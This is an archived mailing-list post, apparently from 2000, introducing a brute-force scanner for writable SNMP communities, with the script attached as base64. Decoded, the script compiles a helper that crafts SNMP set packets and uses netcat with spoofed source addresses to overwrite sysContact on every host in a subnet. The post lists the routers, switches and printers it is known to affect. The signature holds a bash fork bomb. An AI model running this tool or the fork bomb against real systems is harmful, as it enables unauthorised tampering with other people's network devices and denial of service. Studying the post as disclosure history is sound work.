This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mimeat_private for more info. --8323328-1309335390-951073883=:993 Content-Type: TEXT/PLAIN; charset=US-ASCII Hmm, to keep you busy, here's brute-force spoofing scanner for writable snmp communities. Requires NetCat and snmp tools (like snmpget) to be installed. Scanning is mostly harmless - it tries to change system.sysContact.0 to 'null' using common default communities (according to securityfocus). Should be run as root. In addition to list of machines given in initial post, it is known to break some Cisco systems (but not recent IOSes, at least not in default configuration), most of 3com products (there was another writable community, which seems to be present everywhere, regardless of 'private', which is disabled by administrators sometimes), HP switches, printers, Ascend *DSL modems etc. Also, it should bypass most of stupid source IP address restrictions for accessing the community. Please use this tool to scan your network only. _______________________________________________________ Michal Zalewski * [lcamtufat_private] <=> [AGS WAN SYSADM] [dione.ids.pl SYSADM] <-> [http://lcamtuf.na.export.pl] [+48 22 551 45 93] [+48 603 110 160] bash$ :(){ :|:&};: =-----=> God is real, unless declared integer. <=-----= --8323328-1309335390-951073883=:993 Content-Type: TEXT/PLAIN; charset=US-ASCII; name=snmpscan Content-Transfer-Encoding: BASE64 Content-ID: <lcamtuf.4.05.10002202011230.993at_private> Content-Description: Content-Disposition: attachment; filename=snmpscan IyEvYmluL3NoDQoNCnJtIC1mIC53YWxrLnRtcCogL3RtcC9zcG9vZi0qIFdZ U1pMTyAmPi9kZXYvbnVsbA0KDQplY2hvICJzbm1wZCB2dWxuZXJhYmlsaXR5 IHNjYW5uZXIgYnkgPGxjYW10dWZAYWdzLnBsPiINCmVjaG8NCg0KeD0kMQ0K UFJFPSQyDQoNCmlmIFsgIiQyIiA9ICIiIF07IHRoZW4NCiAgZWNobyAiVXNh Z2U6ICQwIHN0YXJ0X2F0IGNfc3VibmV0Ig0KICBlY2hvICJleGFtcGxlOiAn JDAgMCAxNzIuMTYuMScgd2lsbCBzY2FuIDE3Mi4xNi4xLjAtMjU1LiINCiAg ZWNobw0KICBleGl0IA0KZmkNCg0KU1BGSUxFPSIvdG1wL3Nwb29mLSQkIg0K DQpjYXQgPiRTUEZJTEUuYyA8PF9FT0ZfDQpjaGFyIGJ1ZlsxMDAwXTsNCmNo YXIgcGFydDFbXT0iMFwyMDJcMC1cMlwxXDBcNCI7DQpjaGFyIHBhcnQyW109 IlwyNDNcMzdcMlwxXDFcMlwxXDBcMlwxXDAwMDBcMDI0MFwyMDJcMFwyMFw2 XDEwK1w2XDFcMlwxXDFcNFwwXDRcNG51bGwiOw0KbWFpbihpbnQgYXJnYyxj aGFyKiphcmd2KSB7DQogIGNoYXIgeD1zdHJsZW4oYXJndlsxXSk7DQogIG1l bWNweShidWYscGFydDEsc2l6ZW9mKHBhcnQxKS0xKTsNCiAgbWVtY3B5KGJ1 ZitzaXplb2YocGFydDEpLTEsJngsMSk7DQogIHN0cmNweShidWYrc2l6ZW9m KHBhcnQxKSxhcmd2WzFdKTsNCiAgbWVtY3B5KGJ1ZitzaXplb2YocGFydDEp K3gscGFydDIsc2l6ZW9mKHBhcnQyKS0xKTsNCiAgd3JpdGUoMSxidWYseCsx K3NpemVvZihwYXJ0MSkrc2l6ZW9mKHBhcnQyKSk7DQp9DQpfRU9GXw0KDQpl Y2hvICJDb21waWxpbmcgaGVscGVyIGFwcGxpY2F0aW9uLi4uIg0KDQpnY2Mg LW8gJFNQRklMRSAkU1BGSUxFLmMNCg0KdGVzdCAteCAkU1BGSUxFIHx8IGV4 aXQNCg0KZWNobyAiU2NhbiByYW5nZTogJFBSRS4keC0yNTUuLi4iDQoNCmlm IFsgIiQxIiA9ICIwIiBdOyB0aGVuDQogIGVjaG8gIiogQ29sbGVjdGluZyBy b3V0aW5nIGluZm9ybWF0aW9uICg2IHNlY29uZHMpLi4uIg0KICAvdXNyL3Ni aW4vdHJhY2Vyb3V0ZSAtbiAtZiAzIC13IDYwICRQUkUuMzIgMj4vZGV2L251 bGwgPi53YWxrLnRtcCAmDQogIHNsZWVwIDYgDQogIGtpbGxhbGwgdHJhY2Vy b3V0ZSAmPi9kZXYvbnVsbA0KICBhd2sgJ3twcmludCAkMn0nIC53YWxrLnRt cCA+LndhbGsudG1wMg0KZmkNCg0KZWNobyAiU3RhcnRpbmcgc2Nhbi4gT3V0 ZmlsZSBpczogV1lTWkxPIg0KDQp3aGlsZSBbICIkeCIgLWx0ICIyNTYiIF07 IGRvDQogIGVjaG8gJFBSRS4keCA+Pi53YWxrLnRtcDINCiAgbGV0IHg9eCsx DQpkb25lDQoNCkNPTU1VTklUSUVTPSJwdWJsaWMgcHJpdmF0ZSB3cml0ZSBh bGwgbW9uaXRvciBhZ2VudCBtYW5hZ2VyIE9yaWdFcXVpcE1mciBhZG1pbiBk ZWZhdWx0IHBhc3N3b3JkIHRpdm9saSBvcGVudmlldyBjb21tdW5pdHkgc25t cCBzbm1wZCBzeXN0ZW0iDQoNCmZvciBpIGluIGBjYXQgLndhbGsudG1wMmA7 IGRvDQogIGVjaG8gLW4gIiRpOiAiDQogIHNubXBnZXQgLVIgMiAkaSBwdWJs aWMgc3lzdGVtLnN5c0Rlc2NyLjAgJj4ud2Fsay50bXANCiAgRVJSPSJgZ3Jl cCAtYyAtaUUgJ3JlZnVzZXxlcnJvcnx0aW1lb3V0fGZhaWx8ZGVuaWVkfGZv dW5kfGFjY2UnIC53YWxrLnRtcGAiDQogIGlmIFsgIiRFUlIiID0gIjAiIF07 IHRoZW4NCiAgICBlY2hvICJPSyINCiAgICBlY2hvIC1uICIgIHN5c3RlbTog Ig0KICAgIGF3ayAtRiciJyAne3ByaW50ICQyfScgLndhbGsudG1wID4ud2Fs ay50bXAyDQogICAgU1lTPSJgY2F0IC53YWxrLnRtcDJgIg0KICAgIGVjaG8g IiRTWVMiDQogICAgc25tcGdldCAtUiAyICRpIHB1YmxpYyBzeXN0ZW0uc3lz RGVzY3IuMCAmPi53YWxrLnRtcA0KICAgIGF3ayAtRiciJyAne3ByaW50ICQy fScgLndhbGsudG1wID4ud2Fsay50bXAyDQogICAgU1lTTkFNRT0iYGF3ayAn e3ByaW50ICQxfScgLndhbGsudG1wMmAiDQogICAgIGVjaG8gIiRpICgkU1lT KToiID4+V1lTWkxPDQogICAgIGZvciBqIGluICRDT01NVU5JVElFUyAnYWxs IHByaXZhdGUnICdTZWNyZXQgQzBkZScgJFNZU05BTUU7IGRvDQogICAgICBl Y2hvIC1uICIgICRqPiAiDQogICAgICAkU1BGSUxFICIkaiIgfCBuYyAtdSAk aSAxNjEgJj4vZGV2L251bGwgJg0KICAgICAgJFNQRklMRSAiJGoiIHwgbmMg LXMgMTI3LjAuMC4xIC11ICRpIDE2MSAmPi9kZXYvbnVsbCAmDQogICAgICAk U1BGSUxFICIkaiIgfCBuYyAtcyAkaSAtdSAkaSAxNjEgJj4vZGV2L251bGwg Jg0KICAgICAgJFNQRklMRSAiJGoiIHwgbmMgLXMgJFBSRS4xIC11ICRpIDE2 MSAmPi9kZXYvbnVsbCAmDQogICAgICBzbGVlcCAxDQogICAgICBraWxsYWxs IG5jICY+L2Rldi9udWxsDQogICAgICBzbm1wZ2V0IC1SIDIgJGkgcHVibGlj IHN5c3RlbS5zeXNDb250YWN0LjAgJj4ud2Fsay50bXANCiAgICAgIFdPUktF RD0iYGdyZXAgLWMgbnVsbCAud2Fsay50bXAgMj4vZGV2L251bGxgIg0KICAg ICAgaWYgWyAiJFdPUktFRCIgPSAiMCIgXTsgdGhlbg0KICAgICAgICBlY2hv ICIgIC0gJGogZmFpbGVkLiIgPj5XWVNaTE8NCiAgICAgICAgZWNobyAiZmFp bGVkLiINCiAgICAgIGVsc2UNCiAgICAgICAgZWNobyAiT0siDQogICAgICAg IGVjaG8gIiAgLSAkaiBXT1JLRUQuIiA+PldZU1pMTw0KICAgICAgICBicmVh aw0KICAgICAgZmkNCiAgICBkb25lDQogIGVsc2UNCiAgICBlY2hvICJtaWxj enkuLi4iDQogIGZpDQpkb25lDQoNCmVjaG8gIkRvbmUuIg0Kcm0gLWYgLndh bGsudG1wKiAkU1BGSUxFKg0KIA0K --8323328-1309335390-951073883=:993--
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:36:14 PDT